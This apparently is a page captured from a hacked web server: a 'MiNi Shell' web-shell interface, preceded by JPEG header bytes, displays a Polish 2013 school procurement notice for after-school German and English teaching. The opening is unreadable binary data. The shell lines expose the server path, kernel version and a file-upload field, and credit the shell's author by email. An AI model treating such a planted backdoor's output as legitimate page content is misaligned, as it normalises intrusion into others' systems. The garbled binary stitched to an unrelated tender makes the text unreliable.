JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131113/239585-N-2013.html

<p class="kh_header"><b>Poddębice: Świadczenie usług związanych z wykonywaniem zadań 
na stanowisku  Prowadzącego zajęcia pozalekcyjne
 w ramach projektu: ZAWÓD PRZEPUSTKĄ DO LEPSZEGO JUTRA</b><br>
<b>Numer ogłoszenia: 239585 - 2013; data zamieszczenia: 13.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych w Poddębicach działający w imieniu Powiatu Poddębickiego , ul. Polna 13/15, 99-200 Poddębice, woj. łódzkie, tel. (43) 678 31 13, faks (43) 678 31 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zsppoddebice.pl/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług związanych z wykonywaniem zadań 
na stanowisku  Prowadzącego zajęcia pozalekcyjne
 w ramach projektu: ZAWÓD PRZEPUSTKĄ DO LEPSZEGO JUTRA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego usług doraźnego wsparcia przy realizacji projektu ZAWÓD PRZEPUSTKĄ DO LEPSZEGO JUTRA, obejmujących realizację zadań na stanowisku Prowadzącego zajęcia pozalekcyjne. Przedmiot zamówienia został podzielony na 3 części:
Część I: Stanowisko prowadzącego zajęcia pozalekcyjne pn. Język niemiecki - zajęcia (łącznie 100 godzin lekcyjnych) realizowane w dwóch edycjach po 50 godzin lekcyjnych  (1 godzina lekcyjna = 45 min.) - I edycja w roku szkolnym 2013/2014, II edycja w roku szkolnym 2014/2015.
Część II: Stanowisko prowadzącego zajęcia pozalekcyjne pn. Język angielski grupa nr 1 - zajęcia (łącznie 100 godzin lekcyjnych) realizowane w dwóch edycjach po 50 godzin lekcyjnych  (1 godzina lekcyjna = 45 min.) - I edycja w roku szkolnym 2013/2014, II edycja w roku szkolnym 2014/2015.
Część III: Stanowisko prowadzącego zajęcia pozalekcyjne pn. Język angielski grupa nr 2 - zajęcia (łącznie 100 godzin lekcyjnych) realizowane w dwóch edycjach po 50 godzin lekcyjnych  (1 godzina lekcyjna = 45 min.) - I edycja w roku szkolnym 2013/2014, II edycja w roku szkolnym 2014/2015.

Zakres obowiązków dla każdej z trzech części zamówienia: 
1.	Zapoznanie się z założeniami merytorycznymi projektu określonymi we wniosku o dofinansowanie projektu. 
2.	Podejmowanie działań zapewniających prawidłową realizację zadań projektu.
3.	Prowadzący zajęcia przed rozpoczęciem realizacji danego cyklu zajęć w ramach projektu jest zobowiązany nie później niż w terminie 3 dni roboczych od dnia przeprowadzenia pierwszych zajęć dostarczyć do Biura Projektu następujące dokumenty:
a)	listę uczestników zajęć,
b)	oświadczenie uczestniczki/uczestnika projektu o wyrażeniu zgody na przetwarzanie danych osobowych,
c)	oświadczenie uczestniczki/uczestnika projektu o wyrażeniu zgody na wykorzystanie wizerunku, 
d)	deklarację udziału uczestniczki/uczestnika w projekcie,
e)	deklarację uczestnictwa w projekcie, 
f)	kwestionariusz zawierający dane osobowe uczestników biorących udział w projekcie,
4.	Prowadzący zajęcia nie później niż w terminie 5 dni roboczych od momentu podpisania umowy, ale nie później niż w dniu rozpoczęcia zajęć zobowiązany jest dostarczyć do Biura Projektu pisemną informację o planowanym terminie prowadzenia zajęć (dzień tygodnia i godziny) oraz numer pracowni, w której będą się one odbywać.
5.	W przypadku zaistnienia zmian w ust. 3 lit. a) i w ust. 4 zakresu obowiązków prowadzący jest zobowiązany do zgłoszenia tych zmian w Biurze Projektu w terminie 3 dni od dnia ich zaistnienia, w formie pisemnej na stosownym formularzu oraz dostarczenia innych niezbędnych dokumentów związanych z wprowadzonymi zmianami (dokumenty dotyczące nowego uczestnika w Projekcie lub Oświadczenie o rezygnacji z udziału w Projekcie). 
6.	W przypadku, kiedy prowadzący zajęcia nie może ich przeprowadzić zgodnie z aktualnym grafikiem jest zobowiązany poinformować o tym w formie pisemnej Biuro Projektu najpóźniej w dniu, kiedy miały być prowadzone zajęcia (przed ich rozpoczęciem).
7.	Dokumenty, o których mowa w ust. 3 lit. a) oraz ust. 4 zakresu obowiązków, zatwierdza i podpisuje Dyrektor Szkoły lub osoba przez niego upoważniona. Muszą one również zawierać pieczątkę Szkoły oraz pieczątkę imienną podpisującego. 
8.	Dokumenty, o których mowa w ust. 3 lit. b) oraz ust. 3 lit. d) zakresu obowiązków, podpisuje pełnoletni uczestnik projektu, a w przypadku, gdy jest niepełnoletni - rodzic lub opiekun prawny.
9.	Dokument, o którym mowa w  ust. 3 lit. f) zakresu obowiązków wypełnia uczestnik projektu.
10.	Zamawiający może żądać uzupełnienia dokumentów, o których mowa w ust. 3 zakresu obowiązków, jeżeli zostały wypełnione nieprawidłowo.
11.	Realizowanie zajęć zgodnie z programem zajęć złożonym przed zawarciem umowy. W przypadku konieczności dokonania zmian w w/w programie prowadzący zajęcia jest zobowiązany do przedłożenia pisemnej informacji wraz z aktualną wersją programu w Biurze Projektu w terminie 3 dni roboczych od powzięcia informacji o konieczności naniesienia zmian.
12.	Prowadzenie zajęć w terminach i salach - zgodnie z informacją przedłożoną w Biurze Projektu.
13.	Prawidłowe i terminowe prowadzenie dokumentacji projektu (dzienniki zajęć, listy obecności na zajęciach, inna - według potrzeb).
14.	Dbałość o bezpieczeństwo uczestników w czasie zajęć.
15.	Organizowanie, uczestniczenie i sprawowanie opieki nad uczestnikami wyjazdów organizowanych w ramach projektu ( min. 1 wyjazd w trakcie danego cyklu zajęć).
16.	Przechowywanie w pracowniach (w możliwych formach) rezultatów i produktów wypracowanych na zajęciach aż do zakończenia realizacji projektu. 
17.	Sporządzanie comiesięcznych sprawozdań merytorycznych będących warunkiem przyjęcia pracy i w rezultacie rozliczenia finansowego zgodnie z wzorem zatwierdzonym przez Zamawiającego. 
18.	Złożenie w Biurze Projektu, najpóźniej w 5-tym dniu roboczym przed zakończeniem każdego miesiąca, następujących dokumentów:
- sprawozdanie z realizacji programu zajęć w danym okresie, 
- wypełnione listy obecności uczestników na zajęciach,
- wypełniony formularz protokołu odbioru do umowy cywilno - prawnej,
- wypełniony formularz rachunku do umowy cywilno - prawnej,
- zapotrzebowanie na materiały biurowe, dydaktyczne i inne niezbędne do realizacji danych zajęć (cena za sztukę nie może przekraczać 350 zł) na kolejny miesiąc,
- dokumentację związaną z wyjazdem edukacyjnym, jeśli w danym miesiącu prowadzący zajęcia w nim uczestniczył,
- dwa razy w danym cyklu realizacji zajęć dokumentację fotograficzną prezentującą wykorzystywanie zakupionego sprzętu na zajęciach - min. 5 fotografii z danego okresu, którego dotyczy ta dokumentacja (wersja elektroniczna).
19.	W przypadku dostarczenia błędnego sprawozdania merytorycznego z realizacji projektu bądź dostarczenia niekompletnej dokumentacji wymienionej w ust. 18 zakresu obowiązków Zamawiający ma prawo wezwać prowadzącego zajęcia do jej uzupełnienia w  terminie 2 dni roboczych, o czym prowadzący zajęcia jest informowany w formie pisemnej oraz drogą elektroniczną na wskazany przez niego adres e-mail.
20.	Nieuzupełnienie sprawozdania merytorycznego z realizacji projektu w wyznaczonym terminie skutkuje niekwalifikowalnością wydatków, co oznacza, że Zamawiający nie dokonuje adnotacji na rachunku Zleceniobiorcy o przyjęciu wykonania zlecenia.
21.	Zamawiający ma prawo wezwać prowadzącego zajęcia do złożenia dodatkowego sprawozdania z realizacji projektu, o czym informuje w formie pisemnej, wyznaczając jednocześnie termin na jego złożenie.
22.	W przypadku, kiedy prowadzący zajęcia nie realizuje obowiązku wymienionego w ust. 18 zakresu obowiązków w  wyznaczonym po raz trzeci z rzędu terminie, Zamawiający ma prawo rozwiązać zawartą z prowadzącym umowę.
23.	 Końcowe sprawozdanie merytoryczne z realizacji projektu prowadzący zajęcia jest zobowiązany złożyć nie później niż w ciągu 7 dni roboczych od przeprowadzenia ostatnich zajęć w ramach danego cyklu.
24.	Udział w obowiązkowych spotkaniach Personelu Projektu w wyznaczonych terminach.
25.	Aktywny udział w przygotowywaniu i prowadzeniu kampanii promujących projekt oraz innych uroczystości związanych z realizacją projektu.

Przewidywany czas pracy w wymiarze 50 godzin lekcyjnych zajęć dla danej grupy w jednej edycji zajęć, łączna liczba godzin wynosi 300 dla całego przedmiotu zamówienia objętego niniejszym postępowaniem, czyli  po 150 godzin lekcyjnych dla każdej z dwóch edycji; forma zatrudnienia - umowa zlecenie.

Termin realizacji zadania (dla wszystkich części zamówienia): od momentu podpisania umowy do 30.06.2015 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy do realizacji zamówienia wyznaczą osoby posiadające (dla wszystkich części zamówienia):

Prowadzący zajęcia pozalekcyjne: 
a)	wykształcenie wyższe magisterskie,
b)	przygotowanie pedagogiczne,
c)	znajomość specyfiki organizacji pracy środowiska, w którym będzie realizowany projekt.
Zamawiający oceni spełnianie opisanych wyżej warunków udziału w postępowaniu na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, o których mowa w pkt 7.1 SIWZ metodą spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 3 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 ustawy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 2. Zmiana umowy jest dopuszczalna, o ile nie jest zmianą umowy w stosunku do treści oferty złożonej przez Wykonawcę, z zastrzeżeniem pkt 3. 3. Zmiana istotnych postanowień zawartej umowy w stosunku do treści oferty złożonej przez Wykonawcę jest dopuszczalna przy zachowaniu następujących warunków dotyczących: a) przedmiotu zamówienia pod warunkiem, że będą one na korzyść Zamawiającego albo zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności, gdy realizowane jest zamówienie dodatkowe; b) terminu wykonania umowy pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności, gdy realizowane jest zamówienie dodatkowe; c) wynagrodzenia umownego pod warunkiem, że zmiany te są korzystne dla Zamawiającego lub zmiany te będą spowodowane zmniejszeniem zakresu przedmiotu zamówienia bądź koniecznością wykonania zamówienia dodatkowego, bądź zmiany te będą spowodowane zmianami w przepisach prawa. 4. Wszelkie zmiany niniejszej umowy wymagają zachowania formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zsppoddebice.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ponadgimnazjalnych w Poddębicach, ul. Polna 13/15, 99-200 Poddębice, Sekretariat, pokój 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2013 godzina 09:00, miejsce: Zespół Szkół Ponadgimnazjalnych w Poddębicach, ul. Polna 13/15, 99-200 Poddębice, Sekretariat, pokój 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w związku z realizacją projektu: ZAWÓD PRZEPUSTKĄ DO LEPSZEGO JUTRA realizowanego przez Zespół Szkół Ponadgimnazjalnych w Poddębicach w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013, Priorytet IX Rozwój wykształcenia i kompetencji w regionach; Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Stanowisko prowadzącego zajęcia pozalekcyjne pn. Język niemiecki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stanowisko prowadzącego zajęcia pozalekcyjne pn. Język niemiecki - zajęcia (łącznie 100 godzin lekcyjnych) realizowane w dwóch edycjach po 50 godzin lekcyjnych  (1 godzina lekcyjna = 45 min.) - I edycja w roku szkolnym 2013/2014, II edycja w roku szkolnym 2014/2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Stanowisko prowadzącego zajęcia pozalekcyjne pn. Język angielski grupa nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stanowisko prowadzącego zajęcia pozalekcyjne pn. Język angielski grupa nr 1 - zajęcia (łącznie 100 godzin lekcyjnych) realizowane w dwóch edycjach po 50 godzin lekcyjnych  (1 godzina lekcyjna = 45 min.) - I edycja w roku szkolnym 2013/2014, II edycja w roku szkolnym 2014/2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Stanowisko prowadzącego zajęcia pozalekcyjne pn. Język angielski grupa nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stanowisko prowadzącego zajęcia pozalekcyjne pn. Język angielski grupa nr 2 - zajęcia (łącznie 100 godzin lekcyjnych) realizowane w dwóch edycjach po 50 godzin lekcyjnych  (1 godzina lekcyjna = 45 min.) - I edycja w roku szkolnym 2013/2014, II edycja w roku szkolnym 2014/2015..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com